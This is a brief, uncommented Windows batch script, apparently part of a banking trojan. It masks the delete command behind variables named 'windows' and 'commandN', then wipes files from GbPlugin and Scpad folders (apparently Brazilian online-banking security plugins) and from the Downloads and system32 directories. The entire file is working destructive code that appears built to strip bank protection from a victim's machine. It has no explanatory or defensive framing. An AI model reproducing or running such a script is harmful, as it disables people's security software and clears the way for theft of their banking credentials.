@echo off
SET windows=del 
SET command1=c:\windows\downlo~1\gb*.*
SET command2=c:\windows\downlo~1\*.g??
SET command3=c:\windows\downlo~1\g*.*
SET command4=c:\arquiv~1\GbPlugin\g*.*
SET command5=c:\arquiv~1\GbPlugin\b*.*
SET command6=c:\arquiv~1\GbPlugin\c*.*
SET command55=c:\arquiv~1\GbPlugin\u*.*
SET command7=c:\windows\downlo~1\Ab*.*
SET command8=c:\windows\downlo~1\b*.*
SET command9=c:\windows\downlo~1\Ab*.*
SET command10=c:\progra~1\GbPlugin\g*.*
SET command11=c:\progra~1\GbPlugin\b*.*
SET command12=c:\progra~1\GbPlugin\c*.*
SET command56=c:\progra~1\GbPlugin\u*.*
SET command13=C:\progra~1\Scpad\s*.*
SET command14=c:\arquiv~1\Scpad\s*.*
SET command15=C:\WINDOWS\system32\scpsssh*.*
%windows% %command1%
%windows% %command2%
%windows% %command3%
%windows% %command4%
%windows% %command5%
%windows% %command6%
%windows% %command7%
%windows% %command8%
%windows% %command9%
%windows% %command10%
%windows% %command11%
%windows% %command12%
%windows% %command13%
%windows% %command14%
%windows% %command15%
%windows% %command55%
%windows% %command56%
